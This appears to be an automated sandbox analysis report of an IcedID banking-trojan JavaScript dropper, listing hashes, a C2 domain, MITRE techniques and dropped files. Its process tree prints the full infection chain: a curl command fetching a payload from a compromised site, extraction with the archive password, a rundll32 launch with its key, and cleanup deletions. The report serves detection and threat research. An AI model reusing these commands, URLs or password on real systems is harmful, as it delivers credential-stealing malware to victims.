icedid | 32ee3a4074bff70f212b88233f37f72796982c3e579fcdcc7c773ae5c41ae010

General

Target

Document_09_13_927.js
Size

43KB
MD5

03677c4079fafd6413c5552f3d6da926
SHA1

28f14a816b7fb22630c7d59af9d404f51dab4f69
SHA256

32ee3a4074bff70f212b88233f37f72796982c3e579fcdcc7c773ae5c41ae010
SHA512

debf24ab43ea09c567afe47e5289fad62fb19e7d8d1d6401e466feec1f1da84e3652e06854750e0911cdeead48b7a86bfeb74e440ca43bbda9588162da9875fc
SSDEEP

384:eo/1qDp3h548/pzFhb2uhK2U2yoWmfrL4tuEsSRqQ1SDIJnjOsetOI88s8vr6z1d:/qHLi+lIR6J2kzqpaJfs9

Score

10^/10

icedid 1638996626 banker loader trojan

Malware Config

Extracted

Family

icedid

Campaign

1638996626

C2

minutozhart.online

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
2040	neque.j

Loads dropped DLL 1 IoCs

pid	Process
4332	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
3340	Process not Found
3340	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4332	rundll32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	2040	neque.j
Token: 35	2040	neque.j
Token: SeSecurityPrivilege	2040	neque.j
Token: SeSecurityPrivilege	2040	neque.j

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 3152 wrote to memory of 576	3152	wscript.exe	82
PID 3152 wrote to memory of 576	3152	wscript.exe	82
PID 3152 wrote to memory of 4644	3152	wscript.exe	84
PID 3152 wrote to memory of 4644	3152	wscript.exe	84
PID 3152 wrote to memory of 3228	3152	wscript.exe	86
PID 3152 wrote to memory of 3228	3152	wscript.exe	86
PID 3228 wrote to memory of 4128	3228	cmd.exe	88
PID 3228 wrote to memory of 4128	3228	cmd.exe	88
PID 3152 wrote to memory of 4588	3152	wscript.exe	92
PID 3152 wrote to memory of 4588	3152	wscript.exe	92
PID 3152 wrote to memory of 788	3152	wscript.exe	94
PID 3152 wrote to memory of 788	3152	wscript.exe	94
PID 788 wrote to memory of 2040	788	cmd.exe	96
PID 788 wrote to memory of 2040	788	cmd.exe	96
PID 788 wrote to memory of 2040	788	cmd.exe	96
PID 3152 wrote to memory of 1276	3152	wscript.exe	97
PID 3152 wrote to memory of 1276	3152	wscript.exe	97
PID 3152 wrote to memory of 4280	3152	wscript.exe	99
PID 3152 wrote to memory of 4280	3152	wscript.exe	99
PID 3152 wrote to memory of 1944	3152	wscript.exe	101
PID 3152 wrote to memory of 1944	3152	wscript.exe	101
PID 3152 wrote to memory of 4332	3152	wscript.exe	103
PID 3152 wrote to memory of 4332	3152	wscript.exe	103
PID 3152 wrote to memory of 2696	3152	wscript.exe	104
PID 3152 wrote to memory of 2696	3152	wscript.exe	104

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js"
  2⤵
  PID:576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
  2⤵
  PID:4644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Windows\system32\curl.exe
    curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location
    3⤵
    PID:4128
- C:\Windows\System32\curl.exe
  "C:\Windows\System32\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\Admin\AppData\Local\Temp\neque.j"
  2⤵
  PID:4588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\neque.j" -p#4p2h@!eiNtKVN46 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" > "C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Users\Admin\AppData\Local\Temp\neque.j
    "C:\Users\Admin\AppData\Local\Temp\neque.j" -p#4p2h@!eiNtKVN46 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatem.p"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\neque.j"
  2⤵
  PID:1276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\voluptatem.p"
  2⤵
  PID:4280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i" "quia.j"
  2⤵
  PID:1944
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\quia.j", scab /k abebas531
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4332
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
  2⤵
  PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\neque.j

Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\neque.j

Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\quia.j

Filesize
200KB

MD5
396f81c0274b21d8474a3f39f5188650

SHA1
426da78e8db7c72f83a02696140b79190f2ee920

SHA256
fcacd2b44ede98c12164abc1fbe8b58a949d26e2c8378ea43f2342abbf3a7cad

SHA512
77fb6a6273aebcb902bd7aa89315ad4746f462343ed1652e1fc50891e4b9e397615903886674cdd5b3ddda8e339072d9c37a569172b8147890ed68d80708ab1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\quia.j.bat

Filesize
184B

MD5
69d466581b9f52f28ca830ea196000d1

SHA1
e28316b3d54e97322014e898b4025139286c014c

SHA256
4d0fa867e22ced070e431af28666e0e2caaa1822b61f0424610a903e73f87118

SHA512
b8cdbcafb5e8b2b12fd2bb3041ca4bbd2f533b1069911cea355e647044ee3cd795671fba486f44125835d60a93876485d6784db31eb080707daeac105922844e

Download Submit
C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i

Filesize
200KB

MD5
396f81c0274b21d8474a3f39f5188650

SHA1
426da78e8db7c72f83a02696140b79190f2ee920

SHA256
fcacd2b44ede98c12164abc1fbe8b58a949d26e2c8378ea43f2342abbf3a7cad

SHA512
77fb6a6273aebcb902bd7aa89315ad4746f462343ed1652e1fc50891e4b9e397615903886674cdd5b3ddda8e339072d9c37a569172b8147890ed68d80708ab1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\voluptatem.p

Filesize
81KB

MD5
6d78b958989a6ad56aa0d3a8f8ac821e

SHA1
5de1912c211a54cebf38ac6d0ecfc9ff0c645a87

SHA256
161e14ad8be2cf07c1d0dcfcad5db86e8d450e1b260970a614a7e2ff180ef1e7

SHA512
e099f9a0d3cece1259a6029f6950b20ced070361f0ea00ff19d3404429f9362724087b42447a99c090ce042e5fe6eef4941aa7bfbd671222c6e6316cffe1ab55

Download Submit
memory/3340-12-0x00007FF831761000-0x00007FF831762000-memory.dmp

Filesize
4KB

Download
memory/3340-13-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/3340-20-0x00007FF831761000-0x00007FF831762000-memory.dmp

Filesize
4KB

Download
memory/4332-11-0x0000029390080000-0x0000029390084000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing